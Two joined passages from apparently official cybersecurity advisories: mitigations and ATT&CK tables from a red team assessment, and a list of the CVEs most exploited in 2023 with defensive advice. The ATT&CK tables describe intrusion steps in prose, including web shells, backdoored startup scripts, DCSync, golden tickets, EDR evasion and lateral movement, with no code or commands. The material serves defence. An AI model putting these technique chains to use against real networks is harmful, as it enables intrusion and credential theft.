CPGs, including additional recommended baseline protections. Table 2: Recommendations to Mitigate Identified Findings Finding Recommendation Insufficient Network Segmentation of DMZ Apply the principle of least privilege to limit the exposure of systems and services in the DMZ. Segment the DMZ based on the sensitivity of systems and services [CPG 2.F]. Implement firewalls, access control lists, and intrusion prevention systems. Insufficient Network Monitoring Establish a security baseline of normal network traffic and tune network appliances to detect anomalous behavior. Tune host-based products to detect anomalous binaries, lateral movement, and persistence techniques [CPG 3.A]. Create alerts for Windows event log authentication codes, especially for the domain controllers. This could help detect some of the pass-the-ticket, DCSync, and other techniques described in this report. Reduce the attack surface by limiting the use of legitimate administrative pathways and tools such as PowerShell, PsExec, and WMI, which are often used by malicious actors. Select one tool to administer the network, enable logging, and disable the others. Insufficient Host Monitoring in Legacy Environment Implement an EDR solution to monitor legacy hosts for suspicious activity and to detect breaches [CPG 3.A]. Insecure configurations of systems Do not use the no_root_squash option. Remove Unconstrained Delegation from all servers. If Unconstrained Delegation functionality is required, upgrade operating systems and applications to leverage other approaches (e.g., Constrained Delegation) or explore whether systems can be retired or further isolated from the enterprise. Consider disabling or limiting NTLM and WDigest Authentication if possible. Instead, use modern federation protocols (SAML, OIDC) or Kerberos for authentication with AES-256 bit encryption. If NTLM must be enabled, enable Extended Protection for Authentication (EPA) to prevent NTLM-relay attacks, and implement SMB signing to prevent certain adversary-in-the-middle and pass-the-hash attacks. See Microsoft Mitigating NTLM Relay Attacks on Active Directory Certificate Services (AD CS) and Microsoft Overview of Server Message Block signing for more information. Adhere to the principle of least privilege. Ensure the sudoers file contains only essential commands, avoids the use of wildcards, and contains password requirements for command execution. Lack centralized identity management and monitoring systems From a detection standpoint, focus on identity and access management (IAM) rather than just network traffic or static host alerts. Examine who is accessing a resource, what is being accessed, where the request originates, and the time of activity. Use of known insecure and outdated software Keep systems and software up to date. If updates cannot be uniformly installed, update insecure configurations to meet updated standards. Insecure Keys and Credentials Implement a password protection policy for all certificates that contain private keys that ensures every certificate is encrypted with a strong password. Ensure all certificates are stored in a secure location [CPG 2.L]. Regularly audit network shares to identify files that contain passwords accessible to multiple users [CPG 2.L]. Provide training on the proper use of password management tools. Implement a policy that prohibits storing passwords in plaintext, and regularly review and audit Active Directory for plain text passwords [CPG 2.L]. If system administrators must store passwords in active directory, restrict access to only users who require them. Additionally, CISA recommends organizations implement the mitigations below to improve their cybersecurity posture: Provide users with regular training and exercises, specifically related to phishing emails. Phishing accounts for majority of initial access intrusion events. Enforce phishing-resistant MFA to the greatest extent possible. Reduce the risk of credential compromise via the following: Place domain admin accounts in the protected users group to prevent caching of password hashes locally; this also forces Kerberos AES authentication as opposed to weaker RC4 or NTLM authentication protocols. Upgrade to Windows Server 2019 or greater and Windows 10 or greater. These versions have security features not included in older operating systems. As a long-term effort, CISA recommends organizations prioritize implementing a more modern, Zero Trust network architecture that: Leverages secure cloud services for key enterprise security capabilities (e.g., identity and access management, endpoint detection and response, and policy enforcement). Upgrades applications and infrastructure to leverage modern identity management and network access practices. Centralizes and streamlines access to cybersecurity data to drive analytics for identifying and managing cybersecurity risks. Invests in technology and personnel to achieve these goals. Software Manufacturers The above mitigations apply to critical infrastructure organizations with on-premises or hybrid environments. Recognizing that insecure software is the root cause of many of these flaws and responsibility should not fall on the end user, CISA urges software manufacturers to implement the following: Embed security into product architecture throughout the entire software development lifecycle (SDLC). Eliminate default passwords. Do not provide software with default passwords. To eliminate default passwords, require administrators to set a strong password [CPG 2.B] during installation and configuration. Design products so that the compromise of a single security control does not result in compromise of the entire system. For example, narrowly provision user privileges by default and employ ACLs to reduce the impact of a compromised account. This will make it more difficult for a malicious cyber actor to escalate privileges and move laterally. Mandate MFA, ideally phishing-resistant MFA, for privileged users and make MFA a default, rather than opt-in, feature. Reduce hardening guide size, with a focus on systems being secure by default. In this scenario, the red team noticed default Windows Server 2012 configurations that allowed them to enumerate privileged accounts. Important: Manufacturers need to implement routine nudges that are built into the product rather than relying on administrators to have the time, expertise, and awareness to interpret hardening guides. These mitigations align with principles provided in the joint guide Shifting the Balance of Cybersecurity Risk: Principles and Approaches for Secure by Design Software. CISA urges software manufacturers to take ownership of improving security outcomes of their customers by applying these and other secure by design practices. By adhering to secure by design principles, software manufacturers can make their product lines secure out of the box without requiring customers to spend additional resources making configuration changes, purchasing security software and logs, monitoring, and making routine updates. For more information on secure by design, see CISA’s Secure by Design webpage. For more information on common misconfigurations and guidance on reducing their prevalence, see the joint advisory NSA and CISA Red and Blue Teams Share Top Ten Cybersecurity Misconfigurations. VALIDATE SECURITY CONTROLS In addition to applying mitigations, CISA recommends exercising, testing, and validating your organization's security program against the threat behaviors mapped to the MITRE ATT&CK for Enterprise framework in this advisory. CISA recommends testing your existing security controls inventory to assess how they perform against the ATT&CK techniques described in this advisory. To get started: Select an ATT&CK technique described in this advisory (see Table 3 to Table 16). Align your security technologies against the technique. Test your technologies against the technique. Analyze your detection and prevention technologies’ performance. Repeat the process for all security technologies to obtain a set of comprehensive performance data. Tune your security program, including people, processes, and technologies, based on the data generated by this process. CISA recommends continually testing your security program, at scale, in a production environment to ensure optimal performance against the MITRE ATT&CK techniques identified in this advisory. RESOURCES See CISA’s RedEye tool on CISA’s GitHub page. RedEye is an interactive open source analytic tool used to visualize and report red team command and control activities. See CISA’s RedEye tool overview video for more information. See CISA’s Phishing Guidance. See CISA’s Secure by Design page to learn more about secure by design principles. APPENDIX: MITRE ATT&CK TACTICS AND TECHNIQUES See Table 3 to Table 16 for all referenced red team tactics and techniques in this advisory. Note: Unless noted, activity took place during Phase I. For assistance with mapping malicious cyber activity to the MITRE ATT&CK framework, see CISA and MITRE ATT&CK’s Best Practices for MITRE ATT&CK Mapping and CISA’s Decider Tool. Table 3: Reconnaissance Technique Title ID Use Gather Victim Network Information T1590 The team conducted open source research on the target organization to gain information about its network. Gather Victim Network Information: Network Security Appliances T1590.006 The team conducted open source research on the target organization to gain information about its defensive tools. Gather Victim Identity Information: Employee Names T1589.003 The team conducted open source research on the target organization to gain information about its employees. Active Scanning T1595 The team conducted external reconnaissance of the organization’s network. Gather Victim Network Information: IP Addresses T1590.005 The team conducted reconnaissance of the organization’s external IP space. Search Open Websites/Domains T1593 The team conducted open source research to identify information about the organization’s network. Gather Victim Identity Information: Email Addresses T1589.002 The team looked for email addresses and names to infer email addresses from the organization’s email syntax. Search Open Technical Databases: Scan Databases T1596.005 The team conducted reconnaissance with several publicly available tools, such as Shodan and Censys, to discover accessible devices and services on the internet. Search Open Technical Databases: DNS/Passive DNS T1596.001 The team performed reverse DNS lookups on IP addresses within the ranges the TAs provided. Table 4: Resource Development Technique Title ID Use Acquire Infrastructure T1583 The team used third-party owned and operated infrastructure and services throughout its assessment. Obtain Capabilities: Tool T1588.002 The team obtained tools (i.e., Sliver, Mythic, Cobalt Strike, and other commercial C2 frameworks). Table 5: Initial Access Technique Title ID Use Phishing T1566 The team designed spearphishing campaigns tailored to employees of the organization most likely to communicate with external parties. Exploit Public-Facing Application T1190 The team gained initial access to the target by exploiting an internet-facing Linux web server. Phishing: Spearphishing Link T1566.002 The team sent tailored spearphishing emails to 13 targets. Table 6: Execution Technique Title ID Use User Execution T1204 The team’s phishing attempts were ultimately unsuccessful; targets ran the payloads, but their execution did not result in the red team gaining access into the network. User Execution: Malicious File T1204.002 One user responded and executed two malicious payloads. Command and Scripting Interpreter T1059 The preexisting web shell allowed the team to run arbitrary commands on the server. Command and Scripting Interpreter: Python T1059.006 The team used python scripts. System Services: Service Execution T1569.002 The team compromised a Domain Admin account and used it to run PSExec on multiple workstations and a domain controller. Remote Services: SMB/Windows Admin Shares T1021.002 The team established a session that originated from a target. Table 7: Persistence Technique Title ID Use Server Software Component: Web Shell T1505.003 After the failed spearphishing campaigns, the red team continued external reconnaissance of the network and discovered a web shell left from a previous VDP program. Boot or Logon Initialization Scripts T1037 The team backdoored several scripts run at boot time for persistence. Scheduled Task/Job: Cron T1053.003 Some of the team’s techniques included modifying preexisting scripts run by the cron utility and ifup-post scripts. Boot or Logon Initialization Scripts: Network Logon Script T1037.003 The team modified preexisting scripts run by the cron utility and ifup-post scripts. Event Triggered Execution: Unix Shell Configuration Modification T1546.004 The team used a backdoor in .bashrc. Create Account: Local Account T1136.001 During Phase II, the team created a local administrator account on a target server system. Account Manipulation T1098 During Phase II, the team created a local administrator account on a target server system. Create Account: Domain Account T1136.002 The team created AD accounts and added them to domain admins group. Table 8: Privilege Escalation Technique Title ID Use Valid Accounts T1078 The team moved laterally from the web server to the organization’s internal network using valid accounts. Abuse Elevation Control Mechanism: Sudo and Sudo Caching T1548.003 The team discovered that WEBUSER1 had excessive sudo rights, allowing them to run some commands as root without a password. Table 9: Defense Evasion Technique Title ID Use Process Injection T1055 The team modified its processes by changing their names in memory and at execution. Reflective Code Loading T1620 The team used Python scripts run in memory to avoid on-disk detection. Obfuscated Files or Information: Binary Padding T1027.001 The team inflated its file sizes above the upload threshold of the organization’s EDR. Table 10: Credential Access Technique Title ID Use Unsecured Credentials: Credentials In Files T1552.001 The team discovered credential material on a misconfigured Network File System. Steal or Forge Authentication Certificates T1649 The team used a certificate for client authentication discovered on the NFS share to compromise a system configured for Unconstrained Delegation. Steal or Forge Kerberos Tickets: Golden Ticket T1558.001 The team acquired a ticket granting ticket for a domain controller. Unsecured Credentials: Bash History T1552.003 The team used its escalated privileges to search bash command histories. Data from Network Shared Drive T1039 The team used its escalated privileges to search for private certificate files, Secure Shell (SSH) private keys, passwords, bash command histories, and other sensitive data across all user files on the NFS share. Unsecured Credentials: Private Keys T1552.004 The team initially obtained 61 private SSH keys and a file containing valid cleartext domain credentials. Valid Accounts: Domain Accounts T1078.002 The team initially obtained 61 private SSH keys and a file containing valid cleartext domain credentials. Network Sniffing T1187 The red team leveraged this administrative access to upload a modified version of Rubeus in monitor mode to capture incoming tickets. OS Credential Dumping: DCSync T1003.006 The team used DCSync through Linux tunnels to acquire the hash of several privileged accounts. Table 11: Discovery Technique Title ID Use System Network Configuration Discovery T1016 The team leveraged the web shell to identify an open internal proxy server. Account Discovery T1087 The team leveraged their AD data to identify administrators of the SCCM servers. Account Discovery: Domain Account T1087.002 The team queried LDAPS to collect information about users, computers, groups, access control lists (ACL), organizational units (OU), and group policy objects (GPO). During Phase II, the team performed AD enumeration by querying all domain objects from the DC, as well as enumerating trust relationships within the AD Forest, user accounts, and current session information from every domain computer. Remote System Discovery T1018 The team queried LDAPS to collect information about users, computers, groups, access control lists (ACL), organizational units (OU), and group policy objects (GPO). During Phase II, the team performed AD enumeration by querying all domain objects from the DC as well as enumerating trust relationships within the AD Forest, user accounts, and current session information from every domain computer. Permission Groups Discovery: Domain Groups T1069.002 The team queried LDAPS to collect information about users, computers, groups, access control lists (ACL), organizational units (OU), and group policy objects (GPO). Group Policy Discovery T1615 The team queried LDAPS to collect information about users, computers, groups, access control lists (ACL), organizational units (OU), and group policy objects (GPO). Network Service Discovery T1046 The team scanned SMB port 445/TCP. During Phase II, the team launched a scan from inside the network from a previously gained workstation. Permission Groups Discovery T1069 The team discovered a user account through querying the Windows Server 2012 R2 target. Permission Groups Discovery: Local Groups T1069.001 The team used Windows API calls to NetLocalGroupEnum and NetLocalGroupGetMembers to query local groups. Domain Trust Discovery T1482 During Phase II, the team enumerated trust relationships within the AD Forest. System Owner/User Discovery T1033 During Phase II, the team performed AD enumeration by querying all domain objects from the DC, as well as enumerating trust relationships within the AD Forest, user accounts, and current session information from every domain computer. Table 12: Lateral Movement Technique Title ID Use Taint Shared Content T1080 Since no_root_squash was used, the team could read and change any file on the shared file system and leave trojanized applications. Remote Services: SSH T1021.004 The team’s acquisition of SSH private keys of user and service accounts, including two highly privileged accounts with root access to hundreds of servers, facilitated unrestricted lateral movement to other Linux hosts. Software Deployment Tools T1072 Access to an Ansible Tower system provided the team easy access to multiple SBSs. Table 13: Collection Technique Title ID Use Data from Information Repositories T1213 The team accessed a database that received information from OT devices to feed monitoring dashboards, which the organization used to make decisions. Table 14: Command and Control Technique Title ID Use Ingress Tool Transfer T1105 The team then downloaded and executed a Sliver payload that utilized this proxy to establish command and control. During Phase II, the team uploaded and executed a well-known malicious file to a target DC system to generate host-based alerts. Application Layer Protocol: Web Protocols T1071.001 In the organization’s Linux environment, the red team leveraged HTTPS connections for C2. Proxy: Internal Proxy T1090.001 The team leveraged an open internal HTTPS proxy for their traffic. Application Layer Protocol: File Transfer Protocols T1071.002 The team connected to servers over SMB. Proxy: External Proxy T1090.002 The team used cloud platforms to create flexible and dynamic redirect servers to send traffic to the team’s servers. Encrypted Channel T1573 The team encrypted all data in transit and secured all data at rest through a VPN with multifactor authentication. Proxy: Domain Fronting T1090.004 The team used domain fronting to disguise outbound traffic. Application Layer Protocol T1071 During Phase II, the team established a session that originated from a target Workstation system directly to an external host over a clear text protocol, such as HTTP. Table 15: Exfiltration Technique Title ID Use Exfiltration Over Alternative Protocol T1048 During Phase II, the team sent a large amount of mock sensitive information to an external host. Table 16: Impact Technique Title ID Use Account Access Removal T1531 The team locked out several administrative AD accounts in rapid succession.
Summary The following cybersecurity agencies coauthored this joint Cybersecurity Advisory (hereafter collectively referred to as the authoring agencies): United States: The Cybersecurity and Infrastructure Security Agency (CISA), the Federal Bureau of Investigation (FBI), and National Security Agency (NSA) Australia: Australian Signals Directorate’s Australian Cyber Security Centre (ACSC) Canada: Canadian Centre for Cyber Security (CCCS) New Zealand: New Zealand National Cyber Security Centre (NCSC-NZ) and Computer Emergency Response Team New Zealand (CERT NZ) United Kingdom: National Cyber Security Centre (NCSC-UK) This advisory provides details, collected and compiled by the authoring agencies, on the Common Vulnerabilities and Exposures (CVEs) routinely and frequently exploited by malicious cyber actors in 2023 and their associated Common Weakness Enumerations (CWEs). Malicious cyber actors exploited more zero-day vulnerabilities to compromise enterprise networks in 2023 compared to 2022, allowing them to conduct operations against high priority targets. The authoring agencies strongly encourage vendors, designers, developers, and end-user organizations to implement the following recommendations, and those found within the Mitigations section of this advisory, to reduce the risk of compromise by malicious cyber actors. Vendors, designers, and developers. Implement secure by design and default principles and tactics to reduce the prevalence of vulnerabilities in your software. Follow the SP 800-218 Secure Software Development Framework (SSDF) and implement secure by design practices into each stage of the software development life cycle (SDLC). Establish a coordinated vulnerability disclosure program that includes processes to determine root causes of discovered vulnerabilities. Prioritize secure by default configurations, such as eliminating default passwords and not requiring additional configuration changes to enhance product security. Ensure that published CVEs include the proper CWE field, identifying the root cause of the vulnerability. End-user organizations: Apply timely patches to systems. Note: If CVEs identified in this advisory have not been patched, check for signs of compromise before patching. Implement a centralized patch management system. Use security tools such as endpoint detection and response (EDR), web application firewalls, and network protocol analyzers. Ask your software providers to discuss their secure by design program, provide links to information about how they are working to remove classes of vulnerabilities, and to set secure default settings. Purpose The authoring agencies developed this document in furtherance of their respective cybersecurity missions, including their responsibilities to develop and issue cybersecurity specifications and mitigations. Download the PDF version of this report: AA24-317A 2023 Top Routinely Exploited Vulnerabilities (PDF, 907.24 KB ) Technical Details Key Findings In 2023, malicious cyber actors exploited more zero-day vulnerabilities to compromise enterprise networks compared to 2022, allowing them to conduct cyber operations against higher-priority targets. In 2023, the majority of the most frequently exploited vulnerabilities were initially exploited as a zero-day, which is an increase from 2022, when less than half of the top exploited vulnerabilities were exploited as a zero-day. Malicious cyber actors continue to have the most success exploiting vulnerabilities within two years after public disclosure of the vulnerability. The utility of these vulnerabilities declines over time as more systems are patched or replaced. Malicious cyber actors find less utility from zero-day exploits when international cybersecurity efforts reduce the lifespan of zero-day vulnerabilities. Cybersecurity Efforts to Include Implementing security-centered product development lifecycles. Software developers deploying patches to fix software vulnerabilities is often a lengthy and expensive process, particularly for zero-days. The use of more robust testing environments and implementing threat modeling throughout the product development lifecycle will likely reduce overall product vulnerabilities. Increasing incentives for responsible vulnerability disclosure. Global efforts to reduce barriers to responsible vulnerability disclosure could restrict the utility of zero-day exploits used by malicious cyber actors. For example, instituting vulnerability reporting bug bounty programs that allow researchers to receive compensation and recognition for their contributions to vulnerability research may boost disclosures. Using sophisticated endpoint detection and response (EDR) tools. End users leveraging EDR solutions may improve the detection rate of zero-day exploits. Most zero-day exploits, including at least three of the top 15 vulnerabilities from last year, have been discovered when an end user or EDR system reports suspicious activity or unusual device malfunctions. Top Routinely Exploited Vulnerabilities Listed in Table 1 are the top 15 vulnerabilities the authoring agencies observed malicious cyber actors routinely exploiting in 2023 with details also discussed below. CVE-2023-3519: This vulnerability affects Citrix NetScaler ADC and NetScaler Gateway. Allows an unauthenticated user to cause a stack buffer overflow in the NSPPE process by using a HTTP GET request. CVE-2023-4966: This vulnerability affects Citrix NetScaler ADC and NetScaler Gateway. Allows session token leakage; a proof-of-concept for this exploit was revealed in October 2023. CVE-2023-20198: This vulnerability affects Cisco IOS XE Web UI. Allows unauthorized users to gain initial access and issue a command to create a local user and password combination, resulting in the ability to log in with normal user access. CVE-2023-20273: This vulnerability affects Cisco IOS XE, following activity from CVE-2023-20198. Allows privilege escalation, once a local user has been created, to root privileges. CVE-2023-27997: This vulnerability affects Fortinet FortiOS and FortiProxy SSL-VPN. Allows a remote user to craft specific requests to execute arbitrary code or commands. CVE-2023-34362: This vulnerability affects Progress MOVEit Transfer. Allows abuse of an SQL injection vulnerability to obtain a sysadmin API access token. Allows a malicious cyber actor to obtain remote code execution via this access by abusing a deserialization call. CVE-2023-22515: This vulnerability affects Atlassian Confluence Data Center and Server. Allows exploit of an improper input validation issue. Arbitrary HTTP parameters can be translated into getter/setter sequences via the XWorks2 middleware and, in turn, allow Java objects to be modified at run time. The exploit creates a new administrator user and uploads a malicious plugin to get arbitrary code execution. CVE-2021-44228: This vulnerability, known as Log4Shell, affects Apache’s Log4j library, an open source logging framework incorporated into thousands of products worldwide. Allows the execution of arbitrary code. An actor can exploit this vulnerability by submitting a specially crafted request to a vulnerable system, causing the execution of arbitrary code. The request allows a cyber actor to take full control of a system. The actor can then steal information, launch ransomware, or conduct other malicious activity. Malicious cyber actors began exploiting the vulnerability after it was publicly disclosed in December 2021. CVE-2023-2868: This is a remote command injection vulnerability that affects the Barracuda Networks Email Security Gateway (ESG) Appliance. Allows an individual to obtain unauthorized access and remotely execute system commands via the ESG appliance. CVE-2022-47966: This is an unauthenticated remote code execution vulnerability that affects multiple products using Zoho ManageEngine. Allows an unauthenticated user to execute arbitrary code by providing a crafted samlResponse XML to the ServiceDesk Plus SAML endpoint. CVE-2023-27350: This vulnerability affects PaperCut MF/NG. Allows a malicious cyber actor to chain an authentication bypass vulnerability with the abuse of built-in scripting functionality to execute code. CVE-2020-1472: This vulnerability affects Microsoft Netlogon. Allows privilege escalation. An unauthorized user may use non-default configurations to establish a vulnerable Netlogon secure channel connection to a domain controller by using the Netlogon Remote Protocol. Note: This CVE has been included in top routinely exploited vulnerabilities lists since 2021. CVE-2023-42793: This vulnerability can affect JetBrains TeamCity servers. Allows authentication bypass that allows remote code execution against vulnerable JetBrains TeamCity servers. CVE-2023-23397: This vulnerability affects Microsoft Office Outlook. Allows elevation of privilege. A threat actor can send a specially crafted email that the Outlook client will automatically trigger when Outlook processes it. This exploit occurs even without user interaction. CVE-2023-49103: This vulnerability affects ownCloud graphapi. Allows unauthenticated information disclosure. An unauthenticated user can access sensitive data such as admin passwords, mail server credentials, and license keys. Table 1: Top 15 Routinely Exploited Vulnerabilities in 2023 CVE Vendor Product(s) Vulnerability Type CWE CVE-2023-3519 Citrix NetScaler ADC NetScaler Gateway Code Injection CWE-94: Improper Control of Generation of Code ('Code Injection') CVE-2023-4966 Citrix NetScaler ADC NetScaler Gateway Buffer Overflow CWE-119: Improper Restriction of Operations within the Bounds of a Memory Buffer CVE-2023-20198 Cisco IOS XE Web UI Privilege Escalation CWE-420: Unprotected Alternate Channel CVE-2023-20273 Cisco IOS XE Web UI Command Injection CWE-78: Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection') CVE-2023-27997 Fortinet FortiOS FortiProxy SSL-VPN Heap-Based Buffer Overflow CWE-787: Out-of-bounds Write CWE-122: Heap-based Buffer Overflow CVE-2023-34362 Progress MOVEit Transfer SQL Injection CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') CVE-2023-22515 Atlassian Confluence Data Center and Server Broken Access Control CWE-20 Improper Input Validation CVE-2021- 44228 (Log4Shell) Apache Log4j2 Remote Code Execution (RCE) CWE-917 Improper Neutralization of Special Elements used in an Expression Language Statement ('Expression Language Injection') CWE-502: Deserialization of Untrusted Data CWE-20 Improper Input Validation CWE-400 Uncontrolled Resource Consumption CVE-2023-2868 Barracuda Networks ESG Appliance Improper Input Validation CWE-77: Improper Neutralization of Special Elements used in a Command ('Command Injection') CWE-20: Improper Input Validation CVE-2022-47966 Zoho ManageEngine Multiple Products Remote Code Execution CWE-20 Improper Input Validation CVE-2023-27350 PaperCut MF/NG Improper Access Control CWE-284: Improper Access Control CVE-2020-1472 Microsoft Netlogon Privilege Escalation CWE-330: Use of Insufficiently Random Values CVE-2023-42793 JetBrains TeamCity Authentication Bypass CWE-288: Authentication Bypass Using an Alternate Path or Channel CVE-2023-23397 Microsoft Office Outlook Privilege Escalation CWE-294: Authentication Bypass by Capture-replay CWE-20: Improper Input Validation CVE-2023-49103 ownCloud graphapi Information Disclosure CWE-200 Exposure of Sensitive Information to an Unauthorized Actor Additional Routinely Exploited Vulnerabilities The authoring agencies identified other vulnerabilities, listed in Table 2, that malicious cyber actors also routinely exploited in 2023—in addition to the 15 vulnerabilities listed in Table 1. Table 2: Additional Routinely Exploited Vulnerabilities in 2023 CVE Vendor Product Vulnerability Type CWE CVE-2023-22518 Atlassian Confluence Data Center and Server Improper Authorization CWE-863: Incorrect Authorization CVE-2023- 29492 Novi Novi Survey Insecure Deserialization CWE-94 Improper Control of Generation of Code ('Code Injection') CVE-2021-27860 FatPipe WARP, IPVPN, and MPVPN Configuration Upload Exploit CWE-434: Unrestricted Upload of File with Dangerous Type CVE-2021-40539 Zoho ManageEngine ADSelfService Plus Authentication Bypass CWE-706: Use of Incorrectly-Resolved Name or Reference CVE-2023-0669 Fortra GoAnywhere MFT RCE CWE-502: Deserialization of Untrusted Data CVE-2021-22986 F5 BIG-IP and BIG-IQ Centralized Management iControl REST RCE CWE-918: Server-Side Request Forgery (SSRF) CVE-2019-0708 Microsoft Remote Desktop Services RCE CWE-416: Use After Free CVE-2018-13379 Fortinet FortiOS SSL VPN Path Traversal CWE-22: Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') CVE-2022-31199 Netwrix Auditor Insecure Object Deserialization CWE-502: Deserialization of Untrusted Data CVE-2023-35078 Ivanti Endpoint Manager Mobile Authentication Bypass CWE-287: Improper Authentication CVE-2023-35081 Ivanti Endpoint Manager Mobile (EPMM) Path Traversal CWE-22: Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') CVE-2023-44487 N/A HTTP/2 Rapid Reset Attack CWE-400: Uncontrolled Resource Consumption CVE-2023-36844 Juniper Junos OS EX Series PHP External Variable Modification CWE-473: PHP External Variable Modification CVE-2023-36845 Juniper Junos OS EX Series and SRX Series PHP External Variable Modification CWE-473: PHP External Variable Modification CVE-2023-36846 Juniper Junos OS SRX Series Missing Authentication for Critical Function CWE-306: Missing Authentication for Critical Function CVE-2023-36847 Juniper Junos OS EX Series Missing Authentication for Critical Function CWE-306: Missing Authentication for Critical Function CVE-2023-41064 Apple iOS, iPadOS, and macOS ImageIO Buffer Overflow CWE-120: Buffer Copy without Checking Size of Input ('Classic Buffer Overflow') CVE-2023-41061 Apple Apple iOS, iPadOS, and watchOS Wallet Code Execution CWE-20 Improper Input Validation CVE-2021-22205 GitLab Community and Enterprise Editions RCE CWE-94: Improper Control of Generation of Code ('Code Injection') CVE-2019-11510 Ivanti Pulse Connect Secure Arbitrary File Read CWE-22: Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') CVE-2023-6448 Unitronics Vision PLC and HMI Insecure Default Password CWE-798: Use of Hard-coded Credentials CWE-1188: Initialization of a Resource with an Insecure Default CVE-2017-6742 Cisco IOS and IOS XE Software SNMP RCE CWE-119: Improper Restriction of Operations within the Bounds of a Memory Buffer CVE-2021-4034 Red Hat Polkit Out-of-Bounds Read and Write CWE-125: Out-of-bounds Read CWE-787: Out-of-bounds Write CVE-2021-26084 Atlassian Confluence Server and Data Center Object-Graph Navigation Language (OGNL) Injection CWE-917: Improper Neutralization of Special Elements used in an Expression Language Statement ('Expression Language Injection') CVE-2021-33044 Dahua Various products Authentication Bypass CWE-287: Improper Authentication CVE-2021-33045 Dahua Various products Authentication Bypass CWE-287: Improper Authentication CVE-2022-3236 Sophos Firewall Code Injection CWE-94: Improper Control of Generation of Code ('Code Injection') CVE-2022-26134 Atlassian Confluence Server and Data Center RCE CWE-917: Improper Neutralization of Special Elements used in an Expression Language Statement ('Expression Language Injection') CVE-2022-41040 Microsoft Exchange Server Server-Side Request Forgery CWE-918: Server-Side Request Forgery (SSRF) CVE-2023-38831 RARLAB WinRAR Code Execution CWE-345: Insufficient Verification of Data Authenticity CWE-351: Insufficient Type Distinction CVE-2019-18935 Progress Telerik Progress Telerik UI for ASP.NET AJAX Deserialization of Untrusted Data CWE-502: Deserialization of Untrusted Data CVE-2021-34473 Microsoft Microsoft Exchange Server RCE CWE-918: Server-Side Request Forgery (SSRF) Mitigations Vendors and Developers The authoring agencies recommend vendors and developers take the following steps to help ensure their products are secure by design and default: Identify repeatedly exploited classes of vulnerability. Perform an analysis of both CVEs and known exploited vulnerabilities (KEVs) to understand which classes of vulnerability are identified more than others. Implement appropriate mitigations to eliminate those classes of vulnerability. If a product has several instances of SQL injection vulnerabilities, ensure all database queries in the product use parameterized queries and prohibit other forms of queries. Ensure business leaders are responsible for security. Business leaders should ensure their teams take proactive steps to eliminate entire classes of security vulnerabilities, rather than only making one-off patches when new vulnerabilities are discovered. Follow SP 800-218 SSDF and implement secure by design practices into each stage of the SDLC; in particular, aim to perform the following SSDF recommendations: Prioritize the use of memory safe languages wherever possible [SSDF PW 6.1]. Exercise due diligence when selecting software components (e.g., software libraries, modules, middleware, frameworks) to ensure robust security in consumer software products [SSDF PW 4.1]. Set up secure software development team practices—this includes conducting peer code reviews, working to a common organization secure coding standard, and maintaining awareness of language-specific security concerns [SSDF PW.5.1, PW.7.1, PW.7.2]. Establish a vulnerability disclosure program to verify and resolve security vulnerabilities disclosed by people who may be internal or external to the organization [SSDF RV.1.3] and establish processes to determine root causes of discovered vulnerabilities. Use static and dynamic application security testing (SAST/DAST) tools to analyze product source code and application behavior to detect error-prone practices [SSDF PW.7.2, PW.8.2]. Configure production-ready products to have the most secure settings by default and provide guidance on the risks of changing each setting [SSDF PW.9.1, PW9.2]. Prioritize secure by default configurations such as eliminating default passwords, implementing single sign on (SSO) technology via modern open standards, and providing high-quality audit logs to customers with no additional configuration necessary and at no extra charge. Ensure published CVEs include the proper CWE field identifying the root cause of the vulnerability to enable industry-wide analysis of software security and design flaws. For more information on designing secure by design and default products, including additional recommended secure by default configurations, see CISA’s joint guide Shifting the Balance of Cybersecurity Risk: Principles and Approaches for Security by Design and Default. End-User Organizations The authoring agencies recommend end-user organizations implement the mitigations below to improve their cybersecurity posture based on threat actors’ activity. These mitigations align with the cross-sector Cybersecurity Performance Goals (CPGs) developed by CISA and the National Institute of Standards and Technology (NIST). The CPGs provide a minimum set of practices and protections that CISA and NIST recommend all organizations implement. CISA and NIST based the CPGs on existing cybersecurity frameworks and guidance to protect against the most common and impactful threats, tactics, techniques, and procedures. Visit CISA’s CPGs webpage for more information on CPGs, including additional recommended baseline protections. Vulnerability and Configuration Management Update software, operating systems, applications, and firmware on IT network assets in a timely manner [CPG 1.E]. Prioritize patching KEVs, especially those CVEs identified in this advisory, then critical and high vulnerabilities that allow for remote code execution or denial-of-service on internet-facing equipment. For patch information on CVEs identified in this advisory, refer to the Appendix: Patch Information and Additional Resources for Top Exploited Vulnerabilities. If a patch for a KEV or critical vulnerability cannot be quickly applied, implement vendor-approved workarounds. Replace end-of-life software (i.e., software no longer supported by the vendor). Routinely perform automated asset discovery across the entire estate to identify and catalogue all the systems, services, hardware, and software. Implement a robust patch management process and centralized patch management system that establishes prioritization of patch applications [CPG 1.A]. Organizations that are unable to perform rapid scanning and patching of internet-facing systems should consider moving these services to mature, reputable cloud service providers (CSPs) or other managed service providers (MSPs). Reputable MSPs can patch applications (such as webmail, file storage, file sharing, chat, and other employee collaboration tools) for their customers. Note: MSPs and CSPs can expand their customer’s attack surface and may introduce unanticipated risks, so organizations should proactively collaborate with their MSPs and CSPs to jointly reduce risk [CPG 1.F]. For more information and guidance, see the following resources: CISA Insights’ Risk Considerations for MSP Customers. CISA Insights’ Mitigations and Hardening Guidance for MSPs and Small- and Mid-sized Businesses. ACSC’s How to Manage Your Security When Engaging a MSP. Document secure baseline configurations for all IT/OT components, including cloud infrastructure. Monitor, examine, and document any deviations from the initial secure baseline [CPG 2.O]. Perform regular secure system backups and create known good copies of all device configurations for repairs and/or restoration. Store copies off-network in physically secure locations and test regularly [CPG 2.R]. Maintain an updated cybersecurity incident response plan that is tested at least annually and updated within a risk informed time frame to ensure its effectiveness [CPG 2.S]. Identity and Access Management Enforce phishing-resistant multifactor authentication (MFA) for all users without exception [CPG 2.H]. Enforce MFA on all VPN connections. If MFA is unavailable, require employees engaging in remote work to use strong passwords [CPG 2.A, 2.B, 2.C, 2.D, 2.G]. Regularly review, validate, or remove unprivileged accounts (annually at a minimum) [CPG 2.D, 2.E]. Configure access control under the principle of least privilege [CPG 2.O]. Ensure software service accounts only provide necessary permissions (least privilege) to perform intended functions (using non-administrative privileges where feasible). Note: See CISA’s Capacity Enhancement Guide – Implementing Strong Authentication and ACSC’s guidance on Implementing MFA for more information on authentication system hardening. Protective Controls and Architecture Properly configure and secure internet-facing network devices, disable unused or 